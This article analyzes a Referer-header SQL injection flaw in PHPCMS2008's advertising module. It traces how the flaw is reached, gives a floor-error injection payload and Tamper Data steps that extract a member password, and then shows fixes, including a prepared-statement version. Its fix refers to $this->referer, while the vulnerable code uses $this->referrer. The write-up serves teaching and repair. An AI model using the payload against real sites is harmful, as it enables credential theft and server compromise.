2025-04-01 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
The editor shares with you an example analysis of the PHPCMS2008 advertising template SQL injection vulnerability and its repair. I hope you will learn something after reading this article; let's discuss it together!
00 vulnerability description
PHPCMS2008 does not validate the Referer header strictly in its advertising module, which results in a SQL injection vulnerability. The administrator user name and password can be obtained through it, and after logging into the backend the attacker may obtain a webshell and penetrate the server further.
01 vulnerability analysis
Location of the vulnerability: the show method in /ads/include/ads_place.class.php.

    function show($placeid)
    {
        ...
        if ($adses[0]['option']) {
            foreach ($adses as $ads) {
                $contents[] = ads_content($ads, 1);
                $this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]','$username','$ip','$this->referrer','$time','0')");
                $template = $ads['template'] ? $ads['template'] : 'ads';
            }
        }
        ...
    }
In the SQL statement

    $this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]','$username','$ip','$this->referrer','$time','0')");

$this->referrer holds the Referer field of the HTTP request header and is spliced straight into the query string without any filtering. The property is filled in by PHPCMS's own wrapper code, so nothing between the request and the database touches the value.
Now that the flaw has been found, the next step is to find a user-reachable page that leads to it. If the vulnerable code is beyond the user's control, for example if it can only be triggered by the administrator, then it is of little practical value.

Working backwards, we look at which pages call this method.

The page /ads/include/commom.inc.php calls it.

Looking further up, /ads/include/commom.inc.php is included by the file /ads/ad.php.

ad.php is a user-accessible file, but sometimes ad.php cannot be reached directly. Continuing upward leads to /data/js.php.

When a user visits the home page, js.php is called. A harmful Referer value submitted to it is passed down layer by layer until it reaches the dangerous show method, which produces the SQL injection.
02 vulnerability exploitation
There are many ways to modify the Referer field in the request header, such as Burp Suite or Tamper Data.

Here, Firefox's Tamper Data is used to modify it directly:

Click Start Tamper and visit http://your-addr/data/js.php?id=1

At this point Tamper Data pops up; right-click in the right-hand box, add an element, and fill in the payload as its value:

    Referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2), char(45,45), (SELECT password from phpcms_member limit 1)) a from information_schema.tables group by a) b),'0') #
Let me explain here: because the vulnerable SQL statement is an INSERT, nothing is echoed back, so blind injection would work; the payload above uses floor error injection instead, so that the result is returned in the database error message. For the principle of floor error injection, please refer to: floor function usage.

Substituting this payload into the SQL statement gives:

    $this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]','$username','$ip','1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2), char(45,45), (SELECT password from phpcms_member limit 1)) a from information_schema.tables group by a) b),'0') #','$time','0')");

The single quote after 1 closes the referer string literal, the subquery takes the place of the clicktime column, '0' fills the type column, and the # comments out the rest of the original statement.
03 vulnerability repair
Filter the relevant field before it reaches the query:

    $referer = safe_replace($this->referer);
    $this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]','$username','$ip','$referer','$time','0')");
    $template = $ads['template'] ? $ads['template'] : 'ads';

Here safe_replace is the filtering function that PHPCMS2008 itself provides.
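As an added example, not code from PHPCMS2008, the following shows the same click-statistics insert written with a prepared statement, so that the Referer header is sent to the database as a bound value rather than spliced into the SQL text. The function name record_ads_click, the mysqli connection, and the table name passed in are assumptions made for the example; only the column list and the origin of the referer value come from the article.

```php
<?php
// Added example (not PHPCMS2008's own code): the ads_place show() insert
// rewritten with a mysqli prepared statement. Function and variable names
// are assumptions; the column list matches the one in the article.

function record_ads_click(
    mysqli $db,
    string $statTable,   // assumed to be the value of $this->stat_table
    array $ads,
    string $username,
    string $ip,
    string $referer,     // the raw Referer header, untrusted input
    int $time
): bool {
    // Identifiers cannot be bound as parameters, so the table name must be
    // validated separately before it is interpolated into the SQL text.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $statTable)) {
        throw new InvalidArgumentException('invalid stat table name');
    }

    // Bound the length of what we store; a referer column is typically a
    // VARCHAR and an attacker should not be able to fill it arbitrarily.
    $referer = mb_substr($referer, 0, 255);

    // Every user-influenced value is a placeholder. Whatever characters the
    // Referer contains (quotes, comment markers, subqueries), they are treated
    // as data, so the statement structure cannot change.
    $sql = "INSERT INTO `$statTable` "
         . "(`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) "
         . "VALUES (?, ?, ?, ?, ?, '0')";

    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }

    $adsid = (int) $ads['adsid'];
    $stmt->bind_param('isssi', $adsid, $username, $ip, $referer, $time);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Usage (assumed call site inside show()): the header is read exactly as
// before, but it can no longer terminate the string literal in the query.
// $referer = $_SERVER['HTTP_REFERER'] ?? '';
// record_ads_click($db, 'STAT_TABLE_PLACEHOLDER', $ads, $username, $ip, $referer, time());
```

The article's fix runs the value through safe_replace before concatenating it; the parameterized form above removes concatenation of user data altogether, so the same insert stays safe even if the filtering function misses a case. The table name still has to be checked by hand, because placeholders only cover values, not identifiers.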
After reading this article, I believe you have a certain understanding of the "example analysis of the SQL injection vulnerability repair in the PHPCMS2008 advertising template". If you want to know more about it, welcome to follow the industry information channel. Thank you for reading!